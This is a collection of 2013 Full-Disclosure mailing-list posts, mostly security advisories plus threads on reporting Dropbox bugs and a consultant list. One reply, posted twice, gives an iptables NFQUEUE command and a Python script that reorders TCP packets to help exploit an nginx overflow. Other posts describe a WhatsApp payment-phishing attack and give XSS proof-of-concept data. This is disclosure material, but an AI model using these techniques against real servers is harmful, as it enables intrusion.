Re: [Full-disclosure] nginx exploit documentation, about a generic way to exploit Linux targets
Hello everybody, Ioctl is needed to set the nginx socket blocking so another call to write(2) will read much more memory than it is possible with the default non-blocking connection of nginx. This vulnerability was published recently and it seems that many exploiters got stuck because the socket will not block because the buffer is longer than the standard ethernet MTU, some others have found another attack vector without that problem. Let me to explain how we have achieved to overcome the non-blocking socket impediment without doing so much: When packets arriving at the TCP layer are analyzed and once determined the sequence are immediately delivered to the upper layer of the OSI model. Let's imagine that you want to overflow a big buffer through the network. Normally you would execute something like; send(sock, A….A,…); If the size of the data is bigger than the MTU, is then splitted into multiple packages. The destination processes the information on many smaller packages instead of one. In summary,the read()/recv() doesn't get all the data and the overflow is not done. And that's what's happening on ngingx. What we have done to prevent that packets are delivered directly to the next layer is taking profit of TCP windows and TCP reorder: sending the first package on the last place. What happens is that the TCP stack will not deliver the packets to the next layer because the information is not complete, and just wait until all information (up to the size of the tcp window) is received to deliver it. Then the application layer will get all the information in _the same_ read an the overflow will happen. Using that TCP trick, the size limitation of the overflow is the TCP window size instead the MTU. One easy and **dirty** way to implement this is using iptables and nfqueue, but there are some better ones: # iptables -A OUTPUT -p tcp -d IP --destination-port PORT -j NFQUEUE # python nfq.py Regards, ===/ nfq.py /=== import nfqueue import socket import time data_count = 0 delayed = None def cb(dummy, payload): global data_count global delayed data = payload.get_data() # DIRTY for first data package (not three-way-handshake) if len(data) 60: data_count += 1 if (data_count == 1): delayed = payload print data # Just DROP the packet and the local TCP stack will send it again because won't get the ACK. payload.set_verdict(nfqueue.NF_DROP) else: data_count = 0 q = nfqueue.queue() q.open() q.bind(socket.AF_INET) q.set_callback(cb) q.create_queue(0) try: q.try_run() except KeyboardInterrupt: print Exiting... q.unbind(socket.AF_INET) q.close() ===/ nfq.py /=== -- Albert Puigsech Galicia + Mail: alb...@puigsech.com + Jabber: alb...@puigsech.com + Twitter: @apuigsech + Web: http://int3pids.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Where and how to report Dropbox vulnerabilities. (FUN)
We have sent info about vulnerabilities using all forms, also direct e-mail supp...@dropbox.com, we had chat…. After 2 weeks we have got answer from robot: --- You can add a response by replying to this email. Please be sure to reply with the same email address that you used to originally contact us. Dropbox Support, Jul 24 01:44 am (PDT): Hello, Thank you for writing to us. Although we would like to answer all the questions we receive, we can not do it now. If you need to restore multiple files, follow these steps: https://www.dropbox.com/help/400 Please also check our help center to find answers to frequently asked questions: https://www.dropbox.com/help Sorry for the inconvenience. Dropbox team - So the only way is to post all vulnerabilities to FD ? regards, Maciej Gojny ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2013:198 ] libxml2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2013:198 http://www.mandriva.com/en/support/security/ ___ Package : libxml2 Date: July 24, 2013 Affected: Business Server 1.0 ___ Problem Description: Multiple vulnerabilities has been discovered and corrected in libxml2: A denial of service flaw was found in the way libxml2, a library providing support to read, modify and write XML and HTML files, performed string substitutions when entity values for external entity references replacement (--noent option) was requested / enabled during the XML file parsing. A remote attacker could provide a specially-crafted XML file containing an external entity expansion, when processed would lead to excessive CPU consumption (denial of service) (CVE-2013-0339). This a different flaw from CVE-2013-0338. parser.c in libxml2 before 2.9.0, as used in Google Chrome before 28.0.1500.71 and other products, allows remote attackers to cause a denial of service (out-of-bounds read) via a document that ends abruptly, related to the lack of certain checks for the XML_PARSER_EOF state (CVE-2013-2877). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0339 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2877 https://bugzilla.redhat.com/show_bug.cgi?id=915149 https://bugzilla.redhat.com/show_bug.cgi?id=983204 http://advisories.mageia.org/MGASA-2013-0218.html ___ Updated Packages: Mandriva Business Server 1/X86_64: 4ad243c16e07e9f6850513c57cd1aa74 mbs1/x86_64/lib64xml2_2-2.7.8-14.20120229.2.3.mbs1.x86_64.rpm 5bae4c7471edb1a4dfe267588b8f9160 mbs1/x86_64/lib64xml2-devel-2.7.8-14.20120229.2.3.mbs1.x86_64.rpm 6800af0e5ca7348bf35596e57ee0 mbs1/x86_64/libxml2-python-2.7.8-14.20120229.2.3.mbs1.x86_64.rpm 8af9449c2a438abccd86ff5d044b2e71 mbs1/x86_64/libxml2-utils-2.7.8-14.20120229.2.3.mbs1.x86_64.rpm 956fd0fbd8ccd0a705747ea469b87ff7 mbs1/SRPMS/libxml2-2.7.8-14.20120229.2.3.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFR73zmmqjQ0CJFipgRAtsGAKDJR0iwQF2gTcRBeeSbrOwlZu32nQCg00k2 LR1DXtKaEMdY9lPgXZLzldg= =bsXw -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] nginx exploit documentation, about a generic way to exploit Linux targets
Hello everybody, Ioctl is needed to set the nginx socket blocking so another call to write(2) will read much more memory than it is possible with the default non-blocking connection of nginx. This vulnerability was published recently and it seems that many exploiters got stuck because the socket will not block because the buffer is longer than the standard ethernet MTU, some others have found another attack vector without that problem. Let me to explain how we have achieved to overcome the non-blocking socket impediment without doing so much: When packets arriving at the TCP layer are analyzed and once determined the sequence are immediately delivered to the upper layer of the OSI model. Let's imagine that you want to overflow a big buffer through the network. Normally you would execute something like; send(sock, A….A,…); If the size of the data is bigger than the MTU, is then splitted into multiple packages. The destination processes the information on many smaller packages instead of one. In summary,the read()/recv() doesn't get all the data and the overflow is not done. And that's what's happening on ngingx. What we have done to prevent that packets are delivered directly to the next layer is taking profit of TCP windows and TCP reorder: sending the first package on the last place. What happens is that the TCP stack will not deliver the packets to the next layer because the information is not complete, and just wait until all information (up to the size of the tcp window) is received to deliver it. Then the application layer will get all the information in _the same_ read an the overflow will happen. Using that TCP trick, the size limitation of the overflow is the TCP window size instead the MTU. One easy and **dirty** way to implement this is using iptables and nfqueue, but there are some better ones: # iptables -A OUTPUT -p tcp -d IP --destination-port PORT -j NFQUEUE # python nfq.py Regards, ===/ nfq.py /=== import nfqueue import socket import time data_count = 0 delayed = None def cb(dummy, payload): global data_count global delayed data = payload.get_data() # DIRTY for first data package (not three-way-handshake) if len(data) 60: data_count += 1 if (data_count == 1): delayed = payload print data # Just DROP the packet and the local TCP stack will send it again because won't get the ACK. payload.set_verdict(nfqueue.NF_DROP) else: data_count = 0 q = nfqueue.queue() q.open() q.bind(socket.AF_INET) q.set_callback(cb) q.create_queue(0) try: q.try_run() except KeyboardInterrupt: print Exiting... q.unbind(socket.AF_INET) q.close() ===/ nfq.py /=== On 23 July 2013 19:49, king cope isowarez.isowarez.isowa...@googlemail.com wrote: (see attachment) /Kingcope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Albert Puigsech Galicia + Mail: alb...@puigsech.com + Jabber: alb...@puigsech.com + Twitter: @apuigsech + Web: file:///dev/null ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Where and how to report Dropbox vulnerabilities. (FUN)
@Feighen @ Malte Batram I was trying also all these…(security… etc…) Support via chat - requested to send info to support@ regards, Maciej Gojny Wiadomość napisana przez Feighen Oosterbroek feig...@gmail.com w dniu 24 lip 2013, o godz. 11:56: Hey Maciej Not too sure if you've tried any of the security type addresses as listed by rfc2142 http://www.ietf.org/rfc/rfc2142.txt 4. NETWORK OPERATIONS MAILBOX NAMES Operations addresses are intended to provide recourse for customers, providers and others who are experiencing difficulties with the organization's Internet service. MAILBOXAREAUSAGE ------ ABUSE Customer Relations Inappropriate public behaviour NOCNetwork Operations Network infrastructure SECURITY Network SecuritySecurity bulletins or queries perhaps give them a try? Thanks and kind regards Feighen On 24 July 2013 11:29, MG v...@ariko-security.com wrote: We have sent info about vulnerabilities using all forms, also direct e-mail supp...@dropbox.com, we had chat…. After 2 weeks we have got answer from robot: --- You can add a response by replying to this email. Please be sure to reply with the same email address that you used to originally contact us. Dropbox Support, Jul 24 01:44 am (PDT): Hello, Thank you for writing to us. Although we would like to answer all the questions we receive, we can not do it now. If you need to restore multiple files, follow these steps: https://www.dropbox.com/help/400 Please also check our help center to find answers to frequently asked questions: https://www.dropbox.com/help Sorry for the inconvenience. Dropbox team - So the only way is to post all vulnerabilities to FD ? regards, Maciej Gojny ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Where and how to report Dropbox vulnerabilities. (FUN)
Hello, I've contact them a few time by e-mail (secur...@dropbox.com) without problems. https://www.dropbox.com/terms : If you have any questions about security on our website, you can view our Security Overview Page or contact us at secur...@dropbox.com They even have a greetz page https://www.dropbox.com/special_thanks Best regards, 2013/7/24 MG v...@ariko-security.com @Feighen @ Malte Batram I was trying also all these…(security… etc…) Support via chat - requested to send info to support@ regards, Maciej Gojny Wiadomość napisana przez Feighen Oosterbroek feig...@gmail.com w dniu 24 lip 2013, o godz. 11:56: Hey Maciej Not too sure if you've tried any of the security type addresses as listed by rfc2142 http://www.ietf.org/rfc/rfc2142.txt 4. NETWORK OPERATIONS MAILBOX NAMES Operations addresses are intended to provide recourse for customers, providers and others who are experiencing difficulties with the organization's Internet service. MAILBOXAREAUSAGE ------ ABUSE Customer Relations Inappropriate public behaviour NOCNetwork Operations Network infrastructure SECURITY Network SecuritySecurity bulletins or queries perhaps give them a try? Thanks and kind regards Feighen On 24 July 2013 11:29, MG v...@ariko-security.com wrote: We have sent info about vulnerabilities using all forms, also direct e-mail supp...@dropbox.com, we had chat…. After 2 weeks we have got answer from robot: --- You can add a response by replying to this email. Please be sure to reply with the same email address that you used to originally contact us. -- *Dropbox Support, Jul 24 01:44 am (PDT):* * * Hello, Thank you for writing to us. Although we would like to answer all the questions we receive, we can not do it now. If you need to restore multiple files, follow these steps: https://www.dropbox.com/help/400 Please also check our help center to find answers to frequently asked questions: https://www.dropbox.com/help Sorry for the inconvenience. Dropbox team - So the only way is to post all vulnerabilities to FD ? regards, Maciej Gojny ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Top Information Security Consultants to Hire -- WANTED
That does sound more likely Gary B On 07/23/2013 07:55 PM, Daniël W. Crompton wrote: I think he's collecting the names of people he can direct market to. D. On 24 July 2013 01:04, valdis.kletni...@vt.edu mailto:valdis.kletni...@vt.edu wrote: On Mon, 22 Jul 2013 21:23:08 -0500, Bob iPhone Kim said: BUT... turns out that about half of the people we mentioned are NOT looking for new clients. ironic_trombone.wav So are you making a list of actual top consultants, or a list of those people who have free time to read F-D precisely because they *aren't* top consultants? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- blaze your trail -- Daniël W. Crompton daniel.cromp...@gmail.com mailto:daniel.cromp...@gmail.com http://specialbrands.net/ http://specialbrands.net/ http://twitter.com/webhathttp://www.facebook.com/webhathttp://plancast.com/webhathttp://www.linkedin.com/in/redhat ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Top Information Security Consultants to Hire -- WANTED
http://www.evolution-sec.com International Team, Top Researchers and Consultants, Certified Consultants, Public References and Information. ~bkm -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: resea...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Where and how to report Dropbox vulnerabilities. (FUN)
Hey Maciej Not too sure if you've tried any of the security type addresses as listed by rfc2142 http://www.ietf.org/rfc/rfc2142.txt 4. NETWORK OPERATIONS MAILBOX NAMES Operations addresses are intended to provide recourse for customers, providers and others who are experiencing difficulties with the organization's Internet service. MAILBOXAREAUSAGE ------ ABUSE Customer Relations Inappropriate public behaviour NOCNetwork Operations Network infrastructure SECURITY Network SecuritySecurity bulletins or queries perhaps give them a try? Thanks and kind regards Feighen On 24 July 2013 11:29, MG v...@ariko-security.com wrote: We have sent info about vulnerabilities using all forms, also direct e-mail supp...@dropbox.com, we had chat…. After 2 weeks we have got answer from robot: --- You can add a response by replying to this email. Please be sure to reply with the same email address that you used to originally contact us. -- *Dropbox Support, Jul 24 01:44 am (PDT):* * * Hello, Thank you for writing to us. Although we would like to answer all the questions we receive, we can not do it now. If you need to restore multiple files, follow these steps: https://www.dropbox.com/help/400 Please also check our help center to find answers to frequently asked questions: https://www.dropbox.com/help Sorry for the inconvenience. Dropbox team - So the only way is to post all vulnerabilities to FD ? regards, Maciej Gojny ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Top Information Security Consultants to Hire -- WANTED
Why am I not surprised vulnlab is the first one to post here to advertise themselves? 2013/7/24 Vulnerability Lab resea...@vulnerability-lab.com http://www.evolution-sec.com International Team, Top Researchers and Consultants, Certified Consultants, Public References and Information. ~bkm -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: resea...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Phishing Google Wallet and Paypal by abusing WhatsApp
Hi List,
please find the vulnerability description within this post.
Cheers,
Curesec Research Team
Reference:
https://cureblog.de/2013/07/phishing-google-wallet-and-paypal-by-abusing-whatsapp/
Phishing Google Wallet and Paypal by abusing WhatsApp
-=Introduction=-
WhatsApp is one of the most common used tools aka ‘Apps’ on
Smarphone-Devices with access to wireless networks or a so called
Data-’Flatrate’. By using the internet link to communicate, people do
not have to pay any extra fees for sending a text-message somewhere,
even if the receiver is in another country.
WhatsApp is available for almost every architecture on the market. The
program exists for Nokia, Blackberry, Android and iOS. It is available
here: https://www.whatsapp.com. This post will focus on the version for
android.
The app is free for one-year in Android devices. After that time the
user has to buy a yearly license. The application provides 3 methods of
payment:
google wallet
paypal
payment link.
They can be selected via Menu-Settings-Account-Payment Info.
-=Bug=-
Google-wallet and Paypal payments work in the same way. When selecting
it, WhatsApp opens an in-app browser and contacts its main server
www.whatsapp.com with the request:
/payments/google.php?phone=cksum=request
checksumsku=1lg=enlc=US
or
/payments/paypal.php?phone=cksum=request
checksumsku=1lg=enlc=US
Responding to this request the browser gets redirected to the proper
checkout service.
The payment link option seems to be currently not working, i.e., nothing
happens.
-=Attacks=-
Even tough the communication with the payment systems is HTTPS secured,
the initial contact with the main server www.whatsapp.com is NOT, as we
can see in Wireshark logs:
GET
/payments/google.php?phone=xcksum=checksumsku=1lg=enlc=US
HTTP/1.1
Host: www.whatsapp.com
Accept-Encoding: gzip
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.7)
Cookie: __utmmobile=0
Accept:application/xml,application/xhtml+xml,text/html;
q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
After Whatsapp sent this unencrypted request, it will receive the
following answer.
HTTP/1.1 200 OK
X-Powered-By: PHP/5.4.7
Content-type: text/html
Transfer-Encoding: chunked
Date: Mon, 10 May 2013 05:34:36 GMT
Server: lighttpd/1.4.31
5e4
html
head
meta name=HandheldFriendly content=true/
meta http-equiv=Content-Type content=text/html; charset=utf-8 /
titleWhatsApp Messenger payment/title
/head
body onLoad=document.getElementById('google').submit()
pPlease wait.../p
form id=google method=POST action=https://checkout.google.com
api/checkout/v2/checkoutForm/Merchant/xx
accept-charset=utf-8
input type=hidden name=shopping-cart.items.item-1.item-name
value=One year of WhatsApp service for phone XXX/
input type=hidden name=shopping-cart.items.item-1.item-description
value=WhatsApp Messenger/
input type=hidden name=shopping-cart.items.item-1.merchant-item-id
value=1/
input type=hidden
name=shopping-cart.items.item-1.merchant-private-item-data
value=XXX/
input type=hidden name=shopping-cart.items.item-1.unit-price
value=0.99/
input type=hidden
name=shopping-cart.items.item-1.unit-price.currency value=USD/
input type=hidden name=shopping-cart.items.item-1.quantity value=1/
input type=hidden
name=shopping-cart.items.item-1.digital-content.display-disposition
value=OPTIMISTIC/
input type=hidden
name=shopping-cart.items.item-1.digital-content.email-delivery
value=true/
input type=hidden
name=checkout-flow-support.merchant-checkout-flow-support.continue-shopping-url
value=http://www.whatsapp.com/payments/success.php/
input type=hidden name=_charset_ /
/form
/body
/html
0
This means an attacker could intercept the first request via a suitable
man-in-the-middle attack and successfully redirect the user to any
Webpage when the user is trying to buy Whatsapp credit. To gain
useraccounts the attacker could setup a fake Google-Wallet or Paypal
Systems page to harvest user accounts. It might even be possible to
gather directly money through this, for instance let the user pay the
0,99 cents via Google Wallet or Paypal to the account of the attacker.
Besides an attacker could forward some other content like a webpage with
a new apk necessary for using google-wallet or paypal, like the
(in)-famous Zitmo Trojan did at visiting a Bankingsite and spending
users some extra “Security”-Features.
-=Practical abuse of the bug=-
As buying the credit only happens one time per year the attack itself is
quite uncommon to be practical for a huge misuse as the attacker needs
to be in control of the wireless or gsm network to intercept and
redirect the traffic.
-=Affected Versions=-
2.9.6447 to 2.10.751 (latest as of 2013 July 2)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
[Full-disclosure] [Security-news] SA-CONTRIB-2013-060 - Scald - Cross Site Scripting (XSS)
View online: https://drupal.org/node/2049415 * Advisory ID: DRUPAL-SA-CONTRIB-2013-060 * Project: Scald [1] (third-party module) * Version: 6.x, 7.x * Date: 2013-July-24 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This module enables you to handle media assets (atoms) in Drupal with a Views-based library, drag and drop interface and manage content attribution/licensing/distribution. The module doesn't sufficiently filter atom properties such as the atom title when outputting atoms, thereby exposing a Cross Site Scripting (XSS) vulnerability. This vulnerability is mitigated by the fact that an attacker must have a role with the permission to create atoms and the Scald Flash module or the resource management feature (in the MEE submodule) must be enabled. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Scald 6.x-1.x versions prior to 6.x-1.0-beta3. * Scald 7.x-1.x versions prior to 7.x-1.1. Drupal core is not affected. If you do not use the contributed Scald [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Scald module for Drupal 6.x, upgrade to Scald 6.x-1.0-beta3 [5] * If you use the Scald module for Drupal 7.x, upgrade to Scald 7.x-1.1 [6] Also see the Scald [7] project page. REPORTED BY - * Klaus Purer [8] of the Drupal Security Team FIXED BY * Franck Deroche [9] the module maintainer * Hai-Nam Nguyen [10] the module maintainer COORDINATED BY -- * Klaus Purer [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/scald [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/scald [5] https://drupal.org/node/2049239 [6] https://drupal.org/node/2049251 [7] http://drupal.org/project/scald [8] http://drupal.org/user/262198 [9] http://drupal.org/user/59710 [10] http://drupal.org/user/210762 [11] http://drupal.org/user/262198 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in the Cisco Video Surveillance Manager
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Cisco Security Advisory: Multiple Vulnerabilities in the Cisco Video Surveillance Manager Advisory ID: cisco-sa-20130724-vsm Revision 1.0 For Public Release 2013 July 24 16:00 UTC (GMT) +- Summary === The Cisco Video Surveillance Manager (VSM) allows operations managers and system integrators to build customized video surveillance networks to meet their needs. Cisco VSM provides centralized configuration, management, display, and control of video from Cisco and third-party surveillance endpoints. Multiple security vulnerabilities exist in versions of Cisco VSM prior to 7.0.0, which may allow an attacker to gain full administrative privileges on the system. More information on Cisco VSM can be found at http://www.cisco.com/en/US/products/ps10818/index.html. Cisco has released software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are available. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130724-vsm -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.19 (Darwin) iF4EAREKAAYFAlHv3iUACgkQUddfH3/BbTrV2wD8DLMSP/vWdottEKUxbtuV1oQ+ tq7vz7Be9Q5mKn74ZsoA/1R7qkDcrmeKQTuBky432DtScteMcfbys0vD9pcQYoqU =HloY -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iPic Sharp v1.2.1 Wifi iOS - Persistent Foldername Web Vulnerability
Title:
==
iPic Sharp v1.2.1 Wifi iOS - Persistent Foldername Web Vulnerability
Date:
=
2013-07-24
References:
===
http://www.vulnerability-lab.com/get_content.php?id=1031
VL-ID:
=
1031
Common Vulnerability Scoring System:
3.6
Introduction:
=
iPic Sharp Pro is a photos/video management app,can manage your photos/video
into folders and subfolders,
Compress photos/folders into zip file and extract photos from a compressed
(zip/rar), Use password protect
your files, and transfer photos/(zip/rar) between computer and your devices.
Password protect
Password lock entire app
Password lock wifi
Password lock individual folder
View Photos
Photo gallery
Slide show
Thumbnail preview
View Photos app
File Sharing
USB File Sharing via iTunes
Http File Sharing via WiFi, Support Safari, chrome, firefox and IE6/7/8/9
(Slide show )
Chrome and Firefox Supported upload multiple files
Email multiple files, folder Supported
Archives
Extract photos from a compressed zip/rar file
Compression files/folders to zip file
Archives rename, email, batch
( Copy of the Homepge:
https://itunes.apple.com/en/app/ipic-sharp-pro/id449820537 )
Abstract:
=
The Vulnerability Laboratory Research Team discovered a persistent input
validation vulnerability in the iPic Sharp v1.2.1 application (Apple iOS - iPad
iPhone).
Report-Timeline:
2013-07-24:Public Disclosure (Vulnerability Laboratory)
Status:
Published
Affected Products:
==
Apple AppStore
Product: iPic Sharp - Application 1.2.1
Exploitation-Technique:
===
Local
Severity:
=
Medium
Details:
A persistent input validation web vulnerability is detected in the iPic Sharp
v1.2.1 application (Apple iOS - iPad iPhone).
The bug allows an attacker (remote) to implement/inject malicious script code
to the application side (persistent) of the device.
The vulnerability is located in the index file dir listing module of the
web-server (http://localhost:41493) when processing to
request via POST method local manipulated `album folder names`. The persistent
script code will be executed in the main
index file dir listing module when the service lists the new malicious injected
foldername as separate item. Attackers can locally
change the normal album names inside of the apple iOS device (ipad or iphone)
to execute the code when a user is requesting the
mobile application index with the foldername listing.
Exploitation of the persistent web vulnerability requires low user interaction
and a local privilege application device account.
Successful exploitation of the vulnerability can lead to persistent session
hijacking (customers), account steal via persistent
web attacks, persistent phishing or stable (persistent) certificate mail
notification context manipulation.
Vulnerable Application(s):
[+] iPic Sharp v1.2.1 - ITunes or AppStore
(Apple)
Vulnerable Module(s):
[+] Index
Vulnerable Parameter(s):
[+] foldername
Affected Module(s):
[+] Index File Dir - Foldername Listing
Proof of Concept:
=
The persistent input validation web vulnerability can be exploited by local
attackers with low user interaction and no privilege
mobile web application user account. For demonstration or reproduce ...
PoC: Root Parameter
{'isSecret'0,'isSame'1,'isDelete'0,'guid''136'','albumtype'137,'items'[{'PhotoSharp_System_Photo'[{'name''Camera
Roll','isdir'1,'id'0,'filesize'0,'modDate''','url''(null)','section''PhotoSharp_System_Photo','localsection''System
Photos','ispass'0}]},
{'PhotoSharp_Local_Photo'[{'name''.[PERSISTENT INJECTED SCRIPT
CODE!]','isdir'1,'id'0,'filesize'102,'modDate''2013-07-20
145009','url''','section''PhotoSharp_Local_Photo','localsection''Local
Photos','ispass'0}]},
{'PhotoSharp_Local_Document'[{'name''PhotoSharp_Local_Document','isdir'1,'id'0,'filesize'0,'modDate''','url'''
,'section''PhotoSharp_Local_Document','localsection''[PERSISTENT INJECTED
SCRIPT CODE!]','ispass'0}]}],'dir''','dirlocal'''}
PoC: Source
trtd class=photoTd classname=photoTddiv id=PhotoSharp_System_Photo_0
class=watermarkStart
classname=watermarkStarta
href=javascript:loadDir('%2Fu%2FCamera%2520Roll%3FisSystem%3D1','PhotoSharp_System_Photo_0',
'%2Fu%2FCamera%2520Roll');img
src=iPic%20Sharp_files/Camera%2520Roll_75_75.jpg
id=img_PhotoSharp_System_Photo_0
realurl=(null) class=logoStart classname=logoStart/aspan
class=spanAlbum classname=spanAlbumCamera Roll/span/div/td
td class=photoTd classname=photoTddiv id=PhotoSharp_Local_Photo_0
class=watermarkStart classname=watermarkStart
a
href=javascript:loadDir('%2Fu%2F.Default%2520Album%3FisSystem%3D0','PhotoSharp_Local_Photo_0','%2Fu%2F.[PERSISTENT
INJECTED SCRIPT CODE!]');
img src=[PERSISTENT INJECTED SCRIPT
Re: [Full-disclosure] Top Information Security Consultants to Hire -- WANTED
OK... guys... I figured out a simple way to organize and get you on the Top 100 Infosec Consultants List at: - http://sparkah.com/top-infosec-information-security-and-network-security-consultants-in-the-world/ Just add your name, url, and avatar to this google docs form and I'll just copy-paste you into the list as I delete some of the guys on the list who aren't looking for clients... here it is... http://bit.ly/13bBB8E Robert Kim http://sparkah.com San Diego, CA 310 598 1606 On Wed, Jul 24, 2013 at 7:40 AM, Julius Kivimäki julius.kivim...@gmail.comwrote: Why am I not surprised vulnlab is the first one to post here to advertise themselves? 2013/7/24 Vulnerability Lab resea...@vulnerability-lab.com http://www.evolution-sec.com International Team, Top Researchers and Consultants, Certified Consultants, Public References and Information. ~bkm -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: resea...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Robert Q Kim SEO Marketing Advisor Google Page 1 http://sparkah.com/google 2611 S Coast Highway San Diego, CA 92007 310 598 1606 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Top Information Security Consultants to Hire -- WANTED
You're not too terribly quick are you??? Gary B On 07/24/2013 06:31 PM, Bob iPhone Kim wrote: OK... guys... I figured out a simple way to organize and get you on the Top 100 Infosec Consultants List at: - http://sparkah.com/top-infosec-information-security-and-network-security-consultants-in-the-world/ Just add your name, url, and avatar to this google docs form and I'll just copy-paste you into the list as I delete some of the guys on the list who aren't looking for clients... here it is... http://bit.ly/13bBB8E Robert Kim http://sparkah.com San Diego, CA 310 598 1606 On Wed, Jul 24, 2013 at 7:40 AM, Julius Kivimäki julius.kivim...@gmail.com mailto:julius.kivim...@gmail.com wrote: Why am I not surprised vulnlab is the first one to post here to advertise themselves? 2013/7/24 Vulnerability Lab resea...@vulnerability-lab.com mailto:resea...@vulnerability-lab.com http://www.evolution-sec.com International Team, Top Researchers and Consultants, Certified Consultants, Public References and Information. ~bkm -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com http://www.vulnerability-lab.com CONTACT: resea...@vulnerability-lab.com 